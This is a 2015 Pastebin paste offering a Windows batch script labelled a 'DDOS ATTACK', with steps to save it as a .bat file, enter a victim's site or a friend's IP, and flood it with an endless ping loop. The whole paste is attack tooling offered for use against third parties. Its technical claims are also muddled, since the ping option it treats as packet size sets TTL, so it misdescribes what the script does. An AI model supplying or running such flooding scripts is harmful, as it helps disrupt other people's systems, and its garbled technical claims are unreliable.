Advertisement
ukesh

ukeshddos

Feb 15th, 2015
1,403
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 1.Open Notepad
  2. 2.Copy this script into notepad
  3. @echo off
  4. mode 67,16
  5. title ukesh DDOS ATTACK
  6. color 05
  7. cls
  8. echo.
  9. echo
  10. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  11. echo DDOS Bayu Ae
  12. echo
  13. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  14. echo.
  15. set /p x=Apa-Targer Loe:
  16. echo.
  17. echo
  18. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  19. ping %x%
  20. echo
  21. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  22. @ping.exe 127.0.0.1 -n 5 -w 1000 >
  23. nul
  24. goto Next
  25. :Next
  26. echo.
  27. echo.
  28. echo.
  29. set /p m=Ip Host:
  30. echo.
  31. set /p n=Packet Size:
  32. echo.
  33. :DDOS
  34. color 0c
  35. echo Serang Server %m%
  36. ping %m% -i %n% -t >nul
  37. goto DDOS
  38. 3.save as batchfile.
  39. Exam:DDOS.bat
  40. How to Use
  41. ----------
  42. On-Target Server input menu
  43. web address / Ip your friend that you
  44. want to DDOS
  45. for example like this:
  46. Right 2 click to open that batch file..
  47. Get in victim site
  48. get Victim IP
  49. And then input the results of the
  50. ping IP in the host and
  51. Packet Size for it to send the number
  52. of bytes to be
  53. Size size up to you
  54. then press "ENTER" result like this
  55. if you like the picture above means
  56. the process of DDOS successfully on
  57. the run
  58. you want to DDOS depending on
  59. how long.
  60. NB: DO NOT use it carelessly IN
  61. I AM NOT LIABLE IF THINGS DO NOT
  62. HAPPEN IN THE INTENDED
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement